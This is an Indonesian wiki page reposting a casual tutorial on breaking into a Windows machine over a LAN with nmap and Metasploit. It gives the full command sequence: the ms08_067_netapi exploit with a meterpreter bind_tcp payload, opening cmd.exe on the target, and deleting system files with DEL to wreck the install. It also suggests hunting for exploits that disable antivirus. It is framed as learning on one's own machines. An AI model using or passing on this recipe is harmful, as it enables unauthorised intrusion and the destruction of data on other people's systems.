Masuk ke DOS di Windows melalui Jaringan

From OnnoWiki
Jump to navigation Jump to search

Sumber: http://www.facebook.com/note.php?note_id=159342940764666

Maaf sebelumnya, ini bukan buat nakut2in dirimu, tapi ini untuk pembelajaran..sekali lagi mohon maaf yah,,

Peralatan yg mesti dipersiapkan adalah 2 buah kompi dengan OS backtrack/ubuntu dan OS windows lalu sambungkan dengan kabel LAN, karena ini bukan belajar jahat maka kita mesti modal sendiri, jgn kompi orang lain yg di hajar,,kemudian install nmap dan metasploit di linux situ...

Langkah2nya begini nih...

Pertama-tama Kalo situ make backtrack linux langsung aja sudo apt-get install metaspoit tapi kalo situ make ubuntu, terpaksa situ add sourcelistnya backtrack di sources.listnya ubuntu situ,,nahh kalo udah keinstall sekarang coba jalanin metasploitnya, ada 3jenis tuh metasploitnya, coba dibuka aja terminal/consolenya trus ketik $msfconsole(ini buat ngejalanin metasploit yg berbasis console), $msfgui(ini buat jalanin metasploit berbasis applikasi desktop), $msfweb(ini buat jalanin metasploit yg berbasis web,jadi situ buka browser trus di addressbarnya ketik 127.0.0.1:5555 dan gambarnya kayak gini http://www.facebook.com/photo.php?fbid=1346797805113&set=a.1253181704769.29940.1686336794&ref=fbx_album )

Nah pilih aja tuh salah satunya yg menurut situ lebih enjoy yg manah..kalo saya sih lebih enakan make yg console lewat terminal maennya,,

Nih langkah nya kita make yg $msfconsole ,,yaitu lewat terminal...pertama buka terminal/console situ,,dan ketikkan $ nmap ip-target ,jadinya kayak gambar bgini:

73473 1359969494397 1686336794 743341 2529872 n.jpg

nah liat tuh port-port di windows yg kebuka,,port 135 nya kebuka,brati awal yg aman..


selanjutnya buka dah metasploitnya ketik diterminal $ msfconsole , gambarnya kayak begini:

71701 1359972694477 1686336794 743344 7899136 n.jpg

langkah ketiga mulailah kita, kalo mau ngeliat jenis2 exploit yg ada di metasploit ketik aja "show exploits" , tapi kalo situ udah gak sabar karena ngeliat port 135 kebuka langsung aja hajar,dengan mengetikkan

use windows/smb/ms08_067_netapi (enter)
show payload (enter, ini buat ngeliat payload2 yg ada di metasploit, pilih aja salah satu)
set payload windows/meterpreter/bind_tcp (enter)
set lhost 192.168.1.1 (enter, ini ip di kompi situ)
set rhost 192.168.1.2 (enter, ini ip kompi targetnya)

exploit (enter)kalo muncul tulisan kayak gini "Exploit completed, but no session was created" brati antivirus doi keren alias bagus,cari lagi exploit yg bisa matiin anti virus.tapi kalo yg muncul ">meterpreter" brati situ sukses, lanjut ke exploit dengan mengetikkan "execute -f cmd.exe -c -i" tanpa tanda petik, soooo

jadinya kayak gambar ini:

33772 1359979254641 1686336794 743348 1432290 n.jpg

liat baris yg paling bawah,,,situ udah masuk ke system32 nya windows,,,skarang saatnya hajar,,,gampang kok,,gunakan aja perintah (DIR=untuk melihat file-file dan folder serta perintah DEL untuk menghapus file/folder)

coba aja ketikkan DIR, maka akan keluar nama2 file2 n folder2nya, kayak gambar ini:

33462 1359984494772 1686336794 743352 1287692 n.jpg

udah deh kalo mau delete tinggal DEL namafile,,,windowsnya selesai deh ampe disitu,,,sekarang silahkan di patch system situ,,karena ubuntu imut, lucu dan manis bisa2 ngehajarmu dari belakang,,,

module exploit pake metasploit banyak banget disini http://www.offensive-security.com/metasploit-unleashed/ untuk babat server windows jg ada kok,,silahkan dipelajari bagi yg gemar dengan jaringan..



Referensi

Pranala Menarik